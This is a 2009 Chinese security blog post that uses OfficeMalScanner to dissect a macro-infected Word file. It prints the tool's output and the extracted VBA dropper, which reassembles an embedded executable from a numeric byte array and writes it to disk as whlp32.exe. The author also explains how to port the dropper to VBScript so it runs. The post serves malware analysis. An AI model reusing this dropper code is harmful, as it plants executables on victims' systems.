Copyright, 2004-2010 Blast Software, all rights reserved.
皖ICP备09016542号
Blast's Security Lab
2 Aug 2009
曾几何时……其实Office支持他那个引以为豪的内嵌宏(Marco)开始,就有Marco病毒问世了,从早期的W97到现在的W03什么的,宏病毒依然存在,虽然“主流”转向寻找PDF的0day,不过,WORD也是一个大攻击目标,组件多导致漏洞也多,当发现一个漏洞文件时(根据MOS作者的说法是新版DOC文档已经用XML格式了,旧版还压缩着),总不至于让我们直接打开看他的宏吧,于是在大牛的网站上面找到一个工具-OfficeMalScanner(By Frank Boldewin).在他PAPERS下面给出的文档,附带了两个文件,一个是DOC,一个是PPT,都含有MARCO,拿他们做个小范例,虽然PDF里面都说过了,HOHO。
启动程序,如果没有参数,则他默认显示的是使用说明……brute mode名字很强大……
D:\ToolBox\MalOfficeScan>OfficeMalScanner.exe
+------------------------------------------+
| OfficeMalScanner v0.43 |
| Frank Boldewin / www.reconstructer.org |
+------------------------------------------+
Usage:
------
OfficeMalScanner
Options:
scan - scan for several shellcode heuristics and encrypted PE-Files
info - dumps OLE structures, offsets+length and saves found VB-Macro code
Switches: (only enabled if option "scan" was selected)
brute - enables the "brute force mode" to find encrypted stuff
debug - prints out disassembly resp hexoutput if a heuristic was found
Examples:
OfficeMalScanner evil.ppt scan brute debug
OfficeMalScanner evil.ppt scan
OfficeMalScanner evil.ppt info
Malicious index rating:
Executables: 4
Code : 3
STRINGS : 2
OLE : 1
----------------------------------------------------------------------------
I strongly suggest you to scan malicious files in a safe environment
like VMWARE, as this tool is written in C and might have exploitable bugs!
----------------------------------------------------------------------------
基本,软件介绍很清楚了,用它载入DOC文件,命令为:“exe
D:\ToolBox\MalOfficeScan>OfficeMalScanner.exe C:\Test\0908\01\bill.doc info
+------------------------------------------+
| OfficeMalScanner v0.43 |
| Frank Boldewin / www.reconstructer.org |
+------------------------------------------+
[*] INFO mode selected
[*] Opening file C:\Test\0908\01\bill.doc
[*] Filesize is 289280 (0x46a00) Bytes
[*] Valid file format found.
-------------------------
[OLE Struct of: BILL.DOC]
-------------------------
1Table [TYPE: Stream - OFFSET: 0x1400 - LEN: 4096]
Macros [TYPE: Storage]
VBA [TYPE: Storage]
dir [TYPE: Stream - OFFSET: 0x462c0 - LEN: 508]
ThisDocument [TYPE: Stream - OFFSET: 0x5c00 - LEN: 262406]
_VBA_PROJECT [TYPE: Stream - OFFSET: 0x45800 - LEN: 2743]
PROJECT [TYPE: Stream - OFFSET: 0x46500 - LEN: 370]
PROJECTwm [TYPE: Stream - OFFSET: 0x4603c - LEN: 41]
CompObj [TYPE: Stream - OFFSET: 0x46680 - LEN: 106]
WordDocument [TYPE: Stream - OFFSET: 0x200 - LEN: 4142]
SummaryInformation [TYPE: Stream - OFFSET: 0x2400 - LEN: 4096]
DocumentSummaryInformation [TYPE: Stream - OFFSET: 0x2400 - LEN: 4096]
-----------------------------------------------------------------------------
VB-MACRO CODE WAS FOUND INSIDE THIS FILE!
The decompressed Macro code was stored here:
------> D:\ToolBox\MalOfficeScan\BILL.DOC-Macros
-----------------------------------------------------------------------------
他已经把MARCO分离出来了(据他自己说使用了ntdll.dll一个没有公开的函数解压了数据),打开这个文档查看一下。
明显的是一个BAS(VB模块文件)的格式:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const iSymbols = 45297
Const iBlockCount = 158
Dim b(1 To 158) As String
Private Sub Shellcode()
你可以把它修改一下,后缀改为BAS并放到VB执行,不过注意了,不要让他执行生成后的文件(虽然看起来生成的文件是损坏的)
当然你也可以修改下代码,使他可以在VBS中执行,不过需要注意的是:
vbs不允许定义变量带类型,而是执行时自动分配类型。
dim a as string (错误) dim a (正确)
vbs不允许next后面跟变量名,而是由他自己检查。
next i (错误) next (正确)
vbs不允许open方法,故最后一段:
Open NameOfLocalFile For Binary Access Read Write As DatNr
Put #1, , exefile
Close #1
必需改为其他方式写入文件,如fso。
修改后的代码,可在VBS执行,生成文件在C:\whlp32.exe:
Sub main()
Const iSymbols = 45297
Const iBlockCount = 158
Dim b(1 To 158) As String
b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|128|0|0|0|14|31|186|14|0|180|9|205|33|184|1|76|205|33|84|104|105|115|32|112|114|111|103|114|97|109|32|99|97|110|110|111|116|32|98|101|32|114|117|110|32|105|110|32|68|79|83|32|"
'....篇幅问题省略
Dim dumpfile As String: Dim exefile As String
Dim i As Long
For i = 1 To iBlockCount
dumpfile = dumpfile & b(i)
Next i
Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
For i = 0 To iSymbols - 1
exefile = exefile & Chr(parsearr(i))
Next i
Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
NameOfLocalFile = "whlp32.exe"
'PathOfWriteDir = Environ("USERPROFILE")
PathOfWriteDir = "c:\"
ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
Put #1, , exefile
Close #1
End Sub
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。